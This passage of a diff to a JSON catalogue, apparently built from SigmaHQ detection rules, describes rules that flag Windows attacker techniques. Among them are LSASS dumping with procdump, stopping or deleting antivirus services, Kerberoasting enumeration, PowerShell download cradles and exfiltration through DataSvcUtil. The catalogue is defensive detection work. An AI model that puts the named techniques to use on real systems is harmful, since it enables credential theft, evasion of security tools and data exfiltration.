"Unknown" + ], + "filename": "proc_creation_win_susp_splwow64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1429401053229891590?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "value": "Suspicious Splwow64 Without Params" + }, + { + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + ], + "filename": "proc_creation_win_ntfs_short_name_use_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", + "value": "Use NTFS Short Name in Command Line" + }, + { + "description": "Detects PowerShell script execution via input stream redirect", + "meta": { + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "creation_date": "2020/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_run_powershell_script_from_input_stream.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moriarty_Meng/status/984380793383370752", + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "value": "Run PowerShell Script from Redirected Input Stream" + }, + { + "description": "Detects execution of renamed client32.exe (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_netsupport_rat.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "0afbd410-de03-4078-8491-f132303cb67d", + "value": "Execution of Renamed NetSupport RAT" + }, + { + "description": "Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_judgement_panda_gtr19.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.g0010", + "attack.credential_access", + "attack.t1003.001", + "attack.exfiltration", + "attack.t1560.001" + ] + }, + "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422", + "value": "Judgement Panda Exfil Activity" + }, + { + "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/12/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_ta505_dropper.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ForensicITGuy/status/1334734244120309760", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml" + ], + "tags": [ + "attack.execution", + "attack.g0092", + "attack.t1106" + ] + }, + "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", + "value": "TA505 Dropper Load Pattern" + }, + { + "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_powershell_cmdline_specific_comb_methods.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", + "value": "Encoded PowerShell Command Line" + }, + { + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/26", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_krbrelayup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Dec0ne/KrbRelayUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ] + }, + "uuid": "12827a56-61a4-476a-a9cb-f3068f191073", + "value": "KrbRelayUp Hack Tool" + }, + { + "description": "Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).", + "meta": { + "author": "frack113", + "creation_date": "2021/12/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_findstr_385201.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_385201.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "37db85d1-b089-490a-a59a-c7b6f984f480", + "value": "Suspicious Findstr 385201 Execution" + }, + { + "description": "Detects tools and process executions as observed in a Greenbug campaign in May 2020", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_greenbug_may20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml" + ], + "tags": [ + "attack.g0049", + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "3711eee4-a808-4849-8a14-faf733da3612", + "value": "Greenbug Campaign Indicators" + }, + { + "description": "Adversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Legitimate scripts" + ], + "filename": "proc_creation_win_cmd_delete.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3", + "value": "Windows Cmd Delete File" + }, + { + "description": "Identifies usage of hh.exe executing recently modified .chm files.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hh_chm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ] + }, + "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "value": "HH.exe Execution" + }, + { + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/08/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ps_downloadfile.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" + ] + }, + "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "value": "PowerShell DownloadFile" + }, + { + "description": "Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.\nAdversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service\n", + "meta": { + "author": "frack113", + "creation_date": "2021/07/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_service_modification.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "6783aa9e-0dc3-49d4-a94a-8b39c5fd700b", + "value": "Stop Or Remove Antivirus Service" + }, + { + "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/11/18", + "falsepositive": [ + "Legitimate administrative use" + ], + "filename": "proc_creation_win_susp_secedit.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" + ], + "tags": [ + "attack.discovery", + "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", + "attack.privilege_escalation", + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" + ] + }, + "uuid": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", + "value": "Potential Suspicious Activity Using SeCEdit" + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate script" + ], + "filename": "proc_creation_win_msiexec_execute_dll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://twitter.com/_st0pp3r_/status/1583914515996897281", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d", + "value": "Suspicious Msiexec Execute Arbitrary DLL" + }, + { + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_purplesharp_indicators.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/mvelazc0/PurpleSharp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml" + ], + "tags": [ + "attack.t1587", + "attack.resource_development" + ] + }, + "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "value": "PurpleSharp Indicator" }, { "description": "Detects one of the possible scenarios for disabling symantec endpoint protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", @@ -55992,56 +49789,527 @@ "value": "Taskkill Symantec Endpoint Protection" }, { - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "description": "Detects, possibly, malicious unauthorized usage of bcdedit.exe", "meta": { - "author": "Sreeman", - "creation_date": "2020/01/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_task_folder_evasion.yml", - "level": "high", + "author": "@neu5ron", + "creation_date": "2019/02/07", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_bcdedit.yml", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/subTee/status/1216465628946563073", - "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml" + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", + "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bcdedit.yml" ], "tags": [ "attack.defense_evasion", + "attack.t1070", "attack.persistence", - "attack.execution", - "attack.t1574.002" + "attack.t1542.003" ] }, - "uuid": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "value": "Tasks Folder Evasion" + "uuid": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "value": "Possible Ransomware or Unauthorized MBR Modifications" }, { - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "description": "Detects Service Principal Name Enumeration used for Kerberoasting", "meta": { - "author": "@SerkinValery", - "creation_date": "2022/09/16", + "author": "Markus Neis, keepwatch", + "creation_date": "2018/11/14", "falsepositive": [ - "Unknown" + "Administrator Activity" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml", + "filename": "proc_creation_win_spn_enum.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spn_enum.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", + "value": "Possible SPN Enumeration" + }, + { + "description": "Detects when attackers use \"sc.exe\" to delete AV services from the system in order to avoid detection", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such)" + ], + "filename": "proc_creation_win_sc_delete_av_services.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", - "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "7fd4bb39-12d0-45ab-bb36-cebabc73dc7b", + "value": "Suspicious Execution of Sc to Delete AV Services" + }, + { + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/21", + "falsepositive": [ + "File located in the AppData folder with trusted signature" + ], + "filename": "proc_creation_win_susp_microsoft_onenote_child_process.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_microsoft_onenote_child_process.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" + ] + }, + "uuid": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "value": "Suspicious Microsoft OneNote Child Process" + }, + { + "description": "Detects Ryuk Ransomware command lines", + "meta": { + "author": "Vasiliy Burov", + "creation_date": "2019/08/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_mal_ryuk.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_ryuk.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ] + }, + "uuid": "0acaad27-9f02-4136-a243-c357202edd74", + "value": "Ryuk Ransomware Command Line Activity" + }, + { + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "meta": { + "author": "Markus Neis, @Karneades", + "creation_date": "2018/03/06", + "falsepositive": [ + "False positives are possible, depends on organisation and processes" + ], + "filename": "proc_creation_win_powersploit_empire_schtasks.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", + "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", + "value": "Default PowerSploit and Empire Schtasks Persistence" + }, + { + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/31", + "falsepositive": [ + "Rare legitimate inline scripting by some administrators" + ], + "filename": "proc_creation_win_wscript_shell_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "2c28c248-7f50-417a-9186-a85b223010ee", + "value": "Wscript Shell Run In CommandLine" + }, + { + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/01/30", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_susp_wmic_security_product_uninstall.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://twitter.com/cglyer/status/1355171195654709249", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "value": "Wmic Uninstall Security Product" + }, + { + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/23", + "falsepositive": [ + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" + ], + "filename": "proc_creation_win_susp_explorer_nouaccheck.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ORCA6665/status/1496478087244095491", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "value": "Explorer NOUACCHECK Flag" + }, + { + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/10/30", + "falsepositive": [ + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" + ], + "filename": "proc_creation_win_susp_procdump_lsass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" + ] + }, + "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", + "value": "Suspicious Use of Procdump on LSASS" + }, + { + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "meta": { + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "creation_date": "2021/09/30", + "falsepositive": [ + "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", + "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567" + ] + }, + "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_chafer_mar18.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "value": "Chafer Activity" + }, + { + "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "meta": { + "author": "Nasreddine Bencherchali, X__Junior", + "creation_date": "2022/11/30", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_gpg4win_susp_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "value": "Gpg4Win Decrypt Files From Suspicious Locations" + }, + { + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_unusual_child_process_of_dns_exe.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_child_process_of_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "value": "Unusual Child Porcess of dns.exe" + }, + { + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_psr_capture_screenshots.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", + "https://lolbas-project.github.io/lolbas/Binaries/Psr/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "2158f96f-43c2-43cb-952a-ab4580f32382", + "value": "Psr.exe Capture Screenshots" + }, + { + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_dumpstack_log_evasion.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1479094189048713219", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "4f647cfa-b598-4e12-ad69-c68dd16caef8", + "value": "DumpStack.log Defender Evasion" + }, + { + "description": "Identifies execution of nltest.exe and dsquery.exe for domain trust discovery. This technique is used by attackers to enumerate Active Directory trusts.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony 